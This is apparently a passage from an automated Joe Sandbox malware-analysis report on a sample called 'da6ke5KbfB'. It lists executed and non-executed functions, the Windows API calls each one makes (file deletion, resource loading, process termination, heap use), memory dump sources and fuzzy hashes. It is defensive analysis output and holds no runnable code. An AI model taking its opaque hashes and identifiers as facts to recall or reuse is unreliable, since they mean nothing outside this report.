                                                                        • Instruction Fuzzy Hash: 72F0C034454604ABCA117B72FC82D5B3E6AEB1434CB05893EF544700B2CF3A5869AA5E
                                                                        Function 0040AE39 Relevance: 3.0, APIs: 2, Instructions: 12fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetFileAttributesW.KERNEL32(00000002,00000080,0040AE72,007C9F70,00000000,00401FF0,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000), ref: 0040AE50
                                                                        • DeleteFileW.KERNELBASE(00000000,0040AE72,007C9F70,00000000,00401FF0,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 0040AE5A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: File$AttributesDelete
                                                                        • String ID:
                                                                        • API String ID: 2910425767-0
                                                                        • Opcode ID: 856d1dee773f9fe4b81d39230ef639874c988cfb4423ff7bdc63b5e612766022
                                                                        • Instruction ID: 9bbbf45483326d305172a49cd8f3e34a401707f8027ad8c24340846d3084d85d
                                                                        • Opcode Fuzzy Hash: 856d1dee773f9fe4b81d39230ef639874c988cfb4423ff7bdc63b5e612766022
                                                                        • Instruction Fuzzy Hash: 36D09E30488300BBD7555B20DD0D75B7EA16F90745F08CC79B585610F1C7788C64EB4A
                                                                        Function 0040E4D0 Relevance: 3.0, APIs: 2, Instructions: 12memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E4DC
                                                                        • TlsAlloc.KERNEL32(?,00401053,00000000,00001000,00000000,00000000), ref: 0040E4E7
                                                                          • Part of subcall function 0040ED40: HeapAlloc.KERNEL32(007C0000,00000000,0000000C,?,?,0040E4F7,?,00401053,00000000,00001000,00000000,00000000), ref: 0040ED4E
                                                                          • Part of subcall function 0040ED40: HeapAlloc.KERNEL32(007C0000,00000000,00000010,?,?,0040E4F7,?,00401053,00000000,00001000,00000000,00000000), ref: 0040ED62
                                                                          • Part of subcall function 0040ED40: TlsSetValue.KERNEL32(0000000D,00000000,?,?,0040E4F7,?,00401053,00000000,00001000,00000000,00000000), ref: 0040ED8B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: AllocHeap$CreateValue
                                                                        • String ID:
                                                                        • API String ID: 493873155-0
                                                                        • Opcode ID: db5b467741c0f00c93d1fd6ff26af59c18c3d1bccb059c91a176208ebbe690b4
                                                                        • Instruction ID: 280f0189a1b64710240dfbe11500258ab370f1237584088fdcd0bc4150eb2939
                                                                        • Opcode Fuzzy Hash: db5b467741c0f00c93d1fd6ff26af59c18c3d1bccb059c91a176208ebbe690b4
                                                                        • Instruction Fuzzy Hash: F1D012705C83046BE7002BB2BC4A7843A78DB04751F20843AFA095B3D0DAB45480895D
                                                                        Function 0040E500 Relevance: 3.0, APIs: 2, Instructions: 10memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • HeapDestroy.KERNELBASE(007C0000,?,004011C0,00000000,pF|,00000000,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007), ref: 0040E509
                                                                        • TlsFree.KERNELBASE(0000000D,?,004011C0,00000000,pF|,00000000,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007), ref: 0040E516
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: DestroyFreeHeap
                                                                        • String ID:
                                                                        • API String ID: 3293292866-0
                                                                        • Opcode ID: 875c8584e72ba4f9f6744ae97eca28bebe5277f14eb27a090d40f9eb6c4fb1f8
                                                                        • Instruction ID: d3e7c01ca3d7982612482afa56f4a58b9e79d24a02adeb1917deb37a1309afc3
                                                                        • Opcode Fuzzy Hash: 875c8584e72ba4f9f6744ae97eca28bebe5277f14eb27a090d40f9eb6c4fb1f8
                                                                        • Instruction Fuzzy Hash: D8C04C71158208ABCB049BA8FD488D63BBDE7486013448578B50D837A1DA75E840CB58
                                                                        Function 0040B050 Relevance: 2.5, APIs: 2, Instructions: 31memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • HeapFree.KERNEL32(00000000,?,00000000,00000000,?,?,00403394,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000), ref: 0040B093
                                                                        • CloseHandle.KERNELBASE(00000000,00000000,?,?,00403394,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000,00000000,00000800), ref: 0040B09B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: CloseFreeHandleHeap
                                                                        • String ID:
                                                                        • API String ID: 1642312469-0
                                                                        • Opcode ID: bcdd82019f876fc489b22f42e5959096ccfe265fa7cf8be21467e7666472b7d6
                                                                        • Instruction ID: 7abf06afc9ef833db34d05f69b67e4dbbe1385027aa9b24abf0250c41048a97e
                                                                        • Opcode Fuzzy Hash: bcdd82019f876fc489b22f42e5959096ccfe265fa7cf8be21467e7666472b7d6
                                                                        • Instruction Fuzzy Hash: 1AF08C32505110ABC6322B6AEC09E8BBA72EF81724F148A3FF125314F4CB794850DF9C
                                                                        Function 00402BA6 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677
                                                                          • Part of subcall function 0040A220: RtlAllocateHeap.NTDLL(00000008,00000000,00402EAC,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,004044FA,00000000,00000000,00000000), ref: 0040A231
                                                                        • GetShortPathNameW.KERNEL32(007C9F70,007C9F70,00002710), ref: 00402BE0
                                                                          • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                                                                          • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                                                                          • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                                                                          • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                                                                          • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(007C0000,00000000,?), ref: 0040E599
                                                                          • Part of subcall function 0040A200: HeapFree.KERNEL32(00000000,00000000,00401B7C,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0040A20C
                                                                          • Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7
                                                                          • Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402F99,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178
                                                                          • Part of subcall function 0040E5F0: HeapFree.KERNEL32(007C0000,00000000,00000000,?,00000000,?,00412484,00000000,00000000,-00000008), ref: 0040E608
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: HeapValue$AllocateErrorFreeLast$NamePathShortwcslen
                                                                        • String ID:
                                                                        • API String ID: 192546213-0
                                                                        • Opcode ID: f052a35f039049b8e927063d295d98a1685d0b83d51531e0627689d3041be432
                                                                        • Instruction ID: cfcced4fe20ace1cb9c77e507b1d6c1eac9b345b0de8df7ff04b6d7fabcc8d03
                                                                        • Opcode Fuzzy Hash: f052a35f039049b8e927063d295d98a1685d0b83d51531e0627689d3041be432
                                                                        • Instruction Fuzzy Hash: ED012975108205BAE501BB72DD06D3F7669EF80718F108C3EB444B50E2EA3D9C616A2E
                                                                        Function 0040B0C0 Relevance: 1.5, APIs: 1, Instructions: 25fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,?,0040B088,00000000,00000000,?,?,00403394,00000000,00000000,00000800), ref: 0040B0E7
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: FileWrite
                                                                        • String ID:
                                                                        • API String ID: 3934441357-0
                                                                        • Opcode ID: c522352010aa0ffdeb1c8550a8e7d9d94415fd1ef62632f4db173a1ec829df8d
                                                                        • Instruction ID: 9ab85608ef899c62796374e569d53c100cb89dcb0d5a9370bd5502097d7715ab
                                                                        • Opcode Fuzzy Hash: c522352010aa0ffdeb1c8550a8e7d9d94415fd1ef62632f4db173a1ec829df8d
                                                                        • Instruction Fuzzy Hash: F4F0F276104601AFD320CF58D808B87FBE8EB48321F00C82EE59AC2A50C730E810DB55
                                                                        Function 00402B6D Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetNativeSystemInfo.KERNEL32(00000000,?,00000000,00000000), ref: 00402B89
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: InfoNativeSystem
                                                                        • String ID:
                                                                        • API String ID: 1721193555-0
                                                                        • Opcode ID: 700b71109f0c023e3e1c18d21fddf158996dc8241789cbbab02419d6e0a745b1
                                                                        • Instruction ID: 9093739e4f63ff22c3e940b982bbbee8e150dd58fd9266ea6ee1473296d97692
                                                                        • Opcode Fuzzy Hash: 700b71109f0c023e3e1c18d21fddf158996dc8241789cbbab02419d6e0a745b1
                                                                        • Instruction Fuzzy Hash: EBD0C26041810846D710BE658509B9B73E8D700304F608C3AE084961C1F3FCE9D5821B
                                                                        Function 00409F4C Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetExitCodeProcess.KERNELBASE(007C9F70,00000000), ref: 00409F5D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: CodeExitProcess
                                                                        • String ID:
                                                                        • API String ID: 3861947596-0
                                                                        • Opcode ID: 715b6f65d563b86cc3bdca33aaaaf00355598db4e158a89ac330bb58c24c5061
                                                                        • Instruction ID: 3777f5150e176a53f53c72294df7b811d779eaf56e205e5e018731d595f7ee1c
                                                                        • Opcode Fuzzy Hash: 715b6f65d563b86cc3bdca33aaaaf00355598db4e158a89ac330bb58c24c5061
                                                                        • Instruction Fuzzy Hash: 97D0927A91410CFBCB00CB84D945AD9B7FCEB09351F5041A5E904D3210DA35AE14ABA9
                                                                        Function 0040A220 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000,00402EAC,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,004044FA,00000000,00000000,00000000), ref: 0040A231
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: c9295373328ff73b20fc6ca55934024a7e081ff9ecf7500422664bd763381941
                                                                        • Instruction ID: b6192ce9428b1ba2f4eef992fd110c0ccadf60e3b61bfdacf1c665f796a5839f
                                                                        • Opcode Fuzzy Hash: c9295373328ff73b20fc6ca55934024a7e081ff9ecf7500422664bd763381941
                                                                        • Instruction Fuzzy Hash: 97C04C713442006AE6509B24DE09F5776A9BB70742F00C43A7545D11B4DA31D860D72D
                                                                        Function 0040D944 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • TlsFree.KERNELBASE(004011E9,004011BB,00000000,pF|,00000000,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074), ref: 0040D961
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: Free
                                                                        • String ID:
                                                                        • API String ID: 3978063606-0
                                                                        • Opcode ID: 15811b3f4bfa737b04153fc01c2ce6e2fcfebc8c37dca603a4479fd71a9de331
                                                                        • Instruction ID: 46558f9b80a24c5afc9091c09e7b4622d133e72bbd02e604b330f91c0f3fc2b8
                                                                        • Opcode Fuzzy Hash: 15811b3f4bfa737b04153fc01c2ce6e2fcfebc8c37dca603a4479fd71a9de331
                                                                        • Instruction Fuzzy Hash: 15C0487080A200EEEF26ABA4ED0C7E13A71B34430AF84847A9005615F0EB78088CDB8C
                                                                        Function 0040A1C0 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 0040A1C9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: CreateHeap
                                                                        • String ID:
                                                                        • API String ID: 10892065-0
                                                                        • Opcode ID: 632f7ef1fd3851381c9f94796d2a32ace23046017034c32eb606c36269a48e04
                                                                        • Instruction ID: 5a0dfe59a05c5f03c374f6d2b2c7d0e1199ed08054282bce4923ddabcda8d052
                                                                        • Opcode Fuzzy Hash: 632f7ef1fd3851381c9f94796d2a32ace23046017034c32eb606c36269a48e04
                                                                        • Instruction Fuzzy Hash: 10B012702C43005AF2500B209C0AB8039609304B43F304024B2015A1D4CAF01080852C
                                                                        Function 0040993E Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • TerminateProcess.KERNELBASE(00000000,000000FF,00403DE2,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000,?,00000000), ref: 00409946
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: ProcessTerminate
                                                                        • String ID:
                                                                        • API String ID: 560597551-0
                                                                        • Opcode ID: 81ec7d1a7ecaba98e0bd38f101adc261472a3716388094779b9fbb69d1566738
                                                                        • Instruction ID: 6c9933f8183c3cf90a70a052d5255c7038314b529614842de31663aab6e25bc5
                                                                        • Opcode Fuzzy Hash: 81ec7d1a7ecaba98e0bd38f101adc261472a3716388094779b9fbb69d1566738
                                                                        • Instruction Fuzzy Hash: DCB0127120C000BFCA00CB08CE04C057BB1AB513307108360B134410F4CB305814DB05
                                                                        Function 0040A1B0 Relevance: 1.5, APIs: 1, Instructions: 3memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • HeapDestroy.KERNELBASE(004011EE,004011BB,00000000,pF|,00000000,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074), ref: 0040A1B6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: DestroyHeap
                                                                        • String ID:
                                                                        • API String ID: 2435110975-0
                                                                        • Opcode ID: 5b23630fc93442f681a8b5ff80044f68663a3a9fb33361d4051a1176eb808dd7
                                                                        • Instruction ID: c9db44b6d67b1d9878fbeffb7de266838096d73083f09c44833cc4f7101008e2
                                                                        • Opcode Fuzzy Hash: 5b23630fc93442f681a8b5ff80044f68663a3a9fb33361d4051a1176eb808dd7
                                                                        • Instruction Fuzzy Hash: 30900270504000CBDF015B25EF0C4843E75E74030131091F59019400B1CA314451DA0C

                                                                        Non-executed Functions

                                                                        Function 00402664 Relevance: 4.5, APIs: 3, Instructions: 25COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677
                                                                        • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,00402E90,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,004044FA,00000000), ref: 00402675
                                                                        • SizeofResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00402E90,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402685
                                                                          • Part of subcall function 0040A220: RtlAllocateHeap.NTDLL(00000008,00000000,00402EAC,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,004044FA,00000000,00000000,00000000), ref: 0040A231
                                                                          • Part of subcall function 0040A300: memcpy.MSVCRT(?,00000000,00000000,?,?,004026B1,007C9F70,007C9F70,00000000,00000000,00000000,00000000,00000000,00000000,00402E90,00000000), ref: 0040A310
                                                                        • FreeResource.KERNEL32(?,007C9F70,007C9F70,00000000,00000000,00000000,00000000,00000000,00000000,00402E90,00000000,00000000,0000000A,00000000,00000000,00000000), ref: 004026B4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$AllocateFreeHeapLoadSizeofValuememcpy
                                                                        • String ID:
                                                                        • API String ID: 4216414443-0
                                                                        • Opcode ID: eb9f5e1a2f9d4593073a7ec5f81ff8e9b0a970554bd78e40bca009d4aa2b3f01
                                                                        • Instruction ID: 5824db8a20ede0dd59727c61e03ef1c30c3ca7ac97c8101ba0d9721411e394a8
                                                                        • Opcode Fuzzy Hash: eb9f5e1a2f9d4593073a7ec5f81ff8e9b0a970554bd78e40bca009d4aa2b3f01
                                                                        • Instruction Fuzzy Hash: C9F0F871018305EFDB01BF61EC0182EBEA1FB54304F108C3EF488511B1D7378868AB5A
                                                                        Function 0040EFF0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 698COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: L@A
                                                                        • API String ID: 0-2003014581
                                                                        • Opcode ID: fcece218acb953ec57727b535a22294843431f2901f4321beebd5a4c2ced4c5c
                                                                        • Instruction ID: 760e5a69b99611532abf888ee3aa0c8fba98c8b8d08d5900a10969fbbe7fd4b0
                                                                        • Opcode Fuzzy Hash: fcece218acb953ec57727b535a22294843431f2901f4321beebd5a4c2ced4c5c
                                                                        • Instruction Fuzzy Hash: C042AD706047429FD724CF19C54472ABBE0BF84304F14863EE8589BB91D379E99ACF8A
                                                                        Function 00405573 Relevance: 3.1, APIs: 2, Instructions: 128COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetVersionExW.KERNEL32(?), ref: 00405593
                                                                          • Part of subcall function 0040552C: memset.MSVCRT ref: 0040553B
                                                                          • Part of subcall function 0040552C: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,00000000), ref: 0040554A
                                                                          • Part of subcall function 0040552C: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0040555A
                                                                        • GetVersionExW.KERNEL32(?), ref: 004055F2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: Version$AddressHandleModuleProcmemset
                                                                        • String ID:
                                                                        • API String ID: 3445250173-0
